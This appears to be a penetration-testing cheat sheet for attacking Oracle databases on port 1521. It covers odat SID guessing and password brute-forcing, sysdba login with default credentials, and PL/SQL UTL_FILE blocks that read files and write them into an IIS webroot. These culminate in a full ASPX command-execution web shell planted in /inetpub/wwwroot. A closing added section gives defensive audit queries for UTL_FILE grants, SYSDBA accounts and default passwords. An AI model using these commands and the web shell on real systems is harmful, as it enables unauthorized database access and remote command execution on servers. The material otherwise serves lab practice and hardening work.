Oracle SQL | 1521

  • Scan SIDs

odat sidguesser -s 10.10.10.82
  • Brute force Passwords

odat passwordguesser -s 10.10.10.82 -d XE --accounts-file /usr/share/odat/accounts/accounts.txt
  • Log in to the database with SQL*Plus

## ------------------| Setup
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

## ------------------| Login as user
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE

## ------------------| Login as superuser
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
  • SQL*Plus queries

select * from session_privs;
select * from user_role_privs;
  • Read File

set serveroutput ON

declare
   f utl_file.file_type;
   s varchar(5000);
begin
   f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
   utl_file.get_line(f,s);
   utl_file.fclose(f);
   dbms_output.put_line(s);
end;

/
-- Type the '/' on its own line and press Enter to run the block
  • Write File

declare
   f utl_file.file_type;
   s varchar(5000) := 'h4rithd was there';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rith.txt','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

/
-- Type the '/' on its own line and press Enter to run the block
  • Write bind shell (aspx)

declare
   f utl_file.file_type;
   s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rithd.aspx','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

/
-- Type the '/' on its own line and press Enter to run the block
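  • Audit the exposure (added example, not from the original page): the file read/write blocks above need EXECUTE on UTL_FILE plus a path the database may open, and the `as sysdba` login needs a password-file grant. These queries, run as a DBA account, list who holds each; they use standard Oracle dictionary views, and the commented-out REVOKE is an assumed remediation, not something the page prescribes.

```sql
-- Added example, not from the original page. Run as a DBA in SQL*Plus.

-- 1. Who may execute UTL_FILE? A grant to PUBLIC gives it to every session.
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'UTL_FILE'
AND    privilege = 'EXECUTE'
ORDER  BY grantee;

-- 2. Legacy utl_file_dir: paths fopen() accepts as raw strings, as in
--    fopen('/inetpub/wwwroot', ...). No row is returned on 18c and later.
SELECT name, value
FROM   v$parameter
WHERE  name = 'utl_file_dir';

-- 3. Directory objects, their OS paths, and who holds READ/WRITE on them.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
FROM   dba_directories d
LEFT JOIN dba_tab_privs p
       ON  p.table_name = d.directory_name
       AND p.privilege IN ('READ', 'WRITE')
ORDER  BY d.directory_path, p.grantee;

-- 4. Accounts in the password file that can connect AS SYSDBA / AS SYSOPER.
SELECT username, sysdba, sysoper
FROM   v$pwfile_users;

-- 5. Open accounts, and accounts still using a known default password.
SELECT username, account_status
FROM   dba_users
WHERE  account_status = 'OPEN'
ORDER  BY username;
SELECT username FROM dba_users_with_defpwd;

-- 6. Non-SYS objects that depend on UTL_FILE (review before revoking).
SELECT owner, name, type
FROM   dba_dependencies
WHERE  referenced_owner = 'SYS'
AND    referenced_name = 'UTL_FILE'
AND    owner <> 'SYS';

-- Assumed remediation once query 6 has been reviewed:
-- REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
```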
Last updated 2 years ago